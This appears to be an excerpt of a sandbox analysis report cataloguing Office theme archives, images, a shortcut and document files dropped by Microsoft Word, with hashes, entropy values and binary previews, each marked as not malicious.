                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2527736
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992272975565323
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                                                                                                                                                                                                                                                          MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3417042
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997652455069165
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                                                                                                                                                                                                                                                          MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3256855
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996842935632312
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                                                                                                                                                                                                                                                          MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):663
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.949125862393289
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                                                                                                                                                                                                          MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):30
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2389205950315936
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:6S1:6
                                                                                                                                                                                                                                                                                                                                                                          MD5:FA927455A7D9C2D827D5C799279FCF6B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:DF6322D6D43DE5FF63BE5A28687591AA5188DC30
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:08B1947305ED0824418E3B4C7E256F562BE5C38A12CF36FEC58534D35AD75D6E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2034D61D4232D0806BD58E24CFB87CDD0348EC4FBF647AB447244F850ECCC3D7F3306499D26F204922BFB834491B8DF37293E5D0E1F58245FA7F069223A713D4
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:....M.........................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 13:52:06 2024, mtime=Wed Nov 13 15:28:51 2024, atime=Wed Nov 13 15:28:49 2024, length=137779, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):611
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.711422224455272
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:8ZBMwzCmfjl1+QlGE1NjAlH8tD/4dQlGE1HFGcmV:8ZBMwJl4QDAl6aQ1Fpm
                                                                                                                                                                                                                                                                                                                                                                          MD5:30BFE7DEF1C74BFC3ABDBE61B4577871
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C553DCB7BBD3CD7A5FDC3052FAE3CEE1CBFA4422
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B50CB7D85E3CFD86F5A478C84D83DA15B8F28465EC6C19F6DEADA4FBEC02A873
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FA584B38B2C938E4842733AFCBA7E150F4B19DFB671D7EEBFAD5859B9173FAAD76B4ACE91D3E023F341DC3D1AC9B2ADD169DB2E1A4EDE65504780B435128460D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.... ...SA=8.Y..at...5..;....5..3...........................2.3...mY.. .PMENDO~1.DOC..t......GX.vmY.............................Kl.P.m.e.n.d.o.n...e.x.t._.R.e.o.r.d._.A.d.j.u.s.t.m.e.n.t...d.o.c.x.......h...............-.......g............F.......C:\Users\user\Desktop\Pmendon.ext_Reord_Adjustment.docx..8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.m.e.n.d.o.n...e.x.t._.R.e.o.r.d._.A.d.j.u.s.t.m.e.n.t...d.o.c.x.`.......X.......494126...........hT..CrF.f4... .a..F...../....%..hT..CrF.f4... .a..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):91
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604777849791277
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H+vQL4Rch9RUm46OQL4Rch9RUv:H+e4RcfR1Oe4RcfR2
                                                                                                                                                                                                                                                                                                                                                                          MD5:8F978555B4E8167C415F6E05D46DADF2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:171C8A4F363B0BB5B8C1C1D35BB40E303E0C63AA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A3828AA3E108AE1C22DD0541276042BB068282E01BC5792BA06FB2A765B4CB3C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:989803E4DDEBDB8AFB56E60E2C9EDD13F422B2CF699E14CD8B01EA7EDEAED4CA9C2F31364604B1F94E8695ECB9F498DC278F66F7DDB236473AA4CEFAE02EA3DD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[misc]..Pmendon.ext_Reord_Adjustment.LNK=0..[folders]..Pmendon.ext_Reord_Adjustment.LNK=0..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):562113
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.67409707491542
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                                                                                                                                                                                                                                          MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1649585
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.875240099125746
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                                                                                                                                                                                                                                          MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):558035
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.696653383430889
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                                                                                                                                                                                                                                          MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                                                                                                                                                                                                                                          SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):570901
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.674434888248144
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                                                                                                                                                                                                                                          MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):523048
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.715248170753013
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                                                                                                                                                                                                                                          MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3078052
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.954129852655753
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                                                                                                                                                                                                                                          MD5:CDF98D6B111CF35576343B962EA5EEC6
